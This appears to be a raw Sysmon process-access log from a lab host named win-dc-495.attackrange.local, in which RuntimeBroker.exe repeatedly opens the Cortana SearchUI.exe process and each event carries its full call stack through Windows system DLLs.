13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
